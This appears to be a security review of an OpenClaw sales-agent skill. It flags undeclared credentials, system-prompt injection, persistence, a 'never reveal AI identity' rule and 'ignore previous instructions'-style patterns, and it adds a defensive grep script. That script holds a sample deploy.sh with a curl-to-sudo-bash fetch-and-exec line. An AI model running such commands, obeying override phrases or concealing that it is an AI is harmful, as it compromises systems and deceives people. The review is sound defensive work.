!
Purpose & Capability
The SKILL.md describes a multi-channel B2B SDR platform that legitimately needs API keys (LLM provider, MemOS, gateway tokens, channel tokens) and host/network configuration. The registry metadata, however, lists no required environment variables and no primary credential, which is inconsistent with the bundle and misleading to anyone evaluating the skill from the listing alone. Several scripts (deploy.sh, ip-isolate.sh, generate-config.sh) and other files reference credentials and system-level settings that even an 'instruction-only' skill should declare in its metadata.
!
Instruction Scope
Runtime instructions explicitly tell the agent/admin to inject dynamic customer memory into the Agent's System Prompt, add post-conversation hooks, run cron jobs, edit ~/.openclaw/openclaw.json, and enable a network-accessible dashboard (default bind 'lan'). Those actions modify agent and system configuration and rewrite the system prompt. The SKILL.md also contains prompts that demand strict JSON-only outputs and a 'never reveal AI identity' guideline (deceptive behaviour toward the people the agent talks to). Taken together, this expands the skill's scope well beyond a passive helper and grants it broad ability to change agent and system behaviour.
ℹ
Install Mechanism
There is no formal install spec in the registry (instruction-only), but the bundle contains many shell scripts (deploy/*.sh, install.sh, ip-isolate.sh) that the operator is expected to run. Running those scripts will configure networking (wireproxy/WARP), generate tokens, and write config files. That manual-install approach is acceptable, but it is higher-risk because the scripts make system and network changes: review them before running them, and run them first in an isolated test environment.
!
Credentials
Although the registry records no required env vars, SKILL.md and code clearly expect multiple secrets: LLM API key(s), MEMOS_API_KEY, GATEWAY token, TELEGRAM_BOT_TOKEN, Gmail/Sheets IDs, and CRM/WhatsApp config. The skill will read/write external memory backends (MemOS, ChromaDB) and maintain conversation archives. Asking for broad credentials is proportionate to a full SDR platform, but the omission from the skill metadata is a significant mismatch and a transparency problem.
!
Persistence & Privilege
The skill instructs installation of cron jobs, post-conversation hooks, and edits to OpenClaw config and system prompts. These operations give the skill persistent, system-level presence (writes to agent config, dashboard token exposure, network binding defaults). The registry's 'always' flag is false, but the requested modifications allow ongoing autonomous behaviour and broad reach; this is expected for a hosted agent but raises privilege concerns and should be limited to a controlled environment.
Scan Findings in Context
[ignore-previous-instructions] unexpected: Pre-scan flagged patterns indicating prompt-injection style content. The SKILL.md instructs that certain outputs be 'only updated JSON' and contains explicit prompts to inject memory into the System Prompt; while memory injection is part of the feature, 'ignore previous instructions' style constructs are not necessary and are high-risk for prompt override attacks.
[system-prompt-override] expected: The skill explicitly tells operators to inject a dynamic 'Customer Memory Snapshot' into the Agent's System Prompt and to configure Post-Conversation hooks. Injecting memory into the system prompt is functionally needed for the anti-amnesia design, but it is a high-risk capability (it can override system-level behavior) and must be handled carefully and explicitly consented to by the operator.
What to consider before installing
Do not run deploy/install scripts until you review them and confirm their origin. Steps to consider before installing:
- Verify the source: the registry lists no homepage and owner identity is opaque. Check the linked GitHub repo and commit history to confirm authenticity.
- Inspect deploy/*.sh and install.sh line-by-line (or run them in a disposable VM/container) to see what they write, what external URLs they contact, and whether they download binaries.
- Prepare least-privilege credentials: create separate API keys/accounts for MemOS/Chroma/LLM and avoid using production credentials during initial tests.
- Be cautious about the dashboard token and the default 'lan' binding: set GATEWAY_BIND=loopback (or otherwise restrict access to the dashboard) before first start, and treat the generated dashboard token as a secret.
- Note the skill will inject dynamic memory into the System Prompt and modify OpenClaw config; only allow that in environments where you accept the agent changing system prompts and cron jobs.
- Evaluate privacy/regulatory impact: the agent stores conversation history, quotes, and PII in third-party services (MemOS/Chroma); ensure compliance with data protection rules and retention policies.
- If you need to proceed, test in an isolated sandbox (container or VM) and record outbound connections during the deploy (for example with tcpdump or the sandbox's network policy) so that unexpected destinations are visible.
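As an added worked example of the line-by-line script review recommended above (review tooling written for this page; it is not part of the skill bundle or the registry), the following POSIX shell script greps bundled install/deploy scripts for the operations a reviewer should read first: fetch-and-execute pipelines, remote downloads, eval or base64 decoding, writes under system directories, sudo/chmod, cron or OpenClaw config persistence, and WARP/wireproxy/iptables network changes. The RISK_PATTERNS list and the constructed sample deploy.sh are assumptions made for the demo, not the skill's real scripts or a complete list of dangerous constructs.

```shell
#!/bin/sh
# Added example: static triage of bundled install/deploy scripts for the risky
# operations a reviewer should read first. Not part of the skill bundle.
# RISK_PATTERNS is an assumed starting list: one "label@extended-regex" per line.
RISK_PATTERNS='
fetch-and-exec@(curl|wget)[^|]*[|][[:space:]]*(sudo[[:space:]]+)?(ba)?sh
remote-download@(curl|wget)[[:space:]].*https?://
eval-or-decode@(^|[[:space:]])eval[[:space:]]|base64[[:space:]]+(-d|--decode)
system-dir-write@(>|cp|mv|tar|install|tee)[[:space:]].*/(etc|usr/local|usr/bin|opt)/
privilege@(^|[[:space:]])sudo[[:space:]]|chmod[[:space:]]+[0-7+]*[xs]
persistence@crontab|systemctl[[:space:]]+enable|\.openclaw/openclaw\.json
network-config@wireproxy|warp-cli|iptables|ip[[:space:]]+(route|rule)[[:space:]]
'

# scan_script FILE: print "FILE:LABEL:LINE:TEXT" for every line matching a pattern.
scan_script() {
  file=$1
  printf '%s\n' "$RISK_PATTERNS" | while IFS='@' read -r label regex; do
    [ -n "$label" ] || continue
    grep -nE "$regex" "$file" | while IFS= read -r hit; do
      printf '%s:%s:%s\n' "$file" "$label" "$hit"
    done
  done
}

# risk_count FILE: number of flagged lines (0 for a script that trips nothing).
risk_count() {
  scan_script "$1" | wc -l | tr -d '[:space:]'
}

# risk_labels FILE: distinct categories that fired, space separated.
risk_labels() {
  scan_script "$1" | cut -d: -f2 | sort -u | tr '\n' ' '
}

# make_sample: write a constructed deploy.sh (demo input only, not the skill's
# real script) into a temp directory and print its path.
make_sample() {
  dir=$(mktemp -d)
  cat > "$dir/deploy.sh" <<'EOF'
#!/bin/bash
set -e
echo "Installing dependencies"
apt-get install -y jq
curl -fsSL https://example.invalid/install.sh | sudo bash
wget -q https://example.invalid/wireproxy.tar.gz -O /tmp/wp.tgz
tar -xzf /tmp/wp.tgz -C /usr/local/bin
echo "0 3 * * * $HOME/bin/sync-memory.sh" | crontab -
jq '.gateway.bind="lan"' ~/.openclaw/openclaw.json > /tmp/cfg && mv /tmp/cfg ~/.openclaw/openclaw.json
EOF
  printf '%s\n' "$dir/deploy.sh"
}

# Demo run: triage the constructed sample, then any real bundle scripts in the
# current directory (the paths are the ones named in the registry bundle).
sample=$(make_sample)
scan_script "$sample"
echo "flagged lines: $(risk_count "$sample"); categories: $(risk_labels "$sample")"
rm -rf "$(dirname "$sample")"
for f in deploy/*.sh install.sh ip-isolate.sh; do
  if [ -f "$f" ]; then scan_script "$f"; fi
done
```

Run it from the unpacked bundle directory; each flagged line is printed as file:category:line:text so the reviewer can jump straight to the fetch-and-exec and persistence hits before reading anything else. A clean run (zero hits) is not a clean bill of health, since the pattern list is deliberately small and an obfuscated script will not match it; it only orders the manual review.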
If you want, I can scan the deploy and ip-isolate scripts for specific risky operations (remote downloads, exec of fetched payloads, or writes to system directories) and summarize which lines to review first.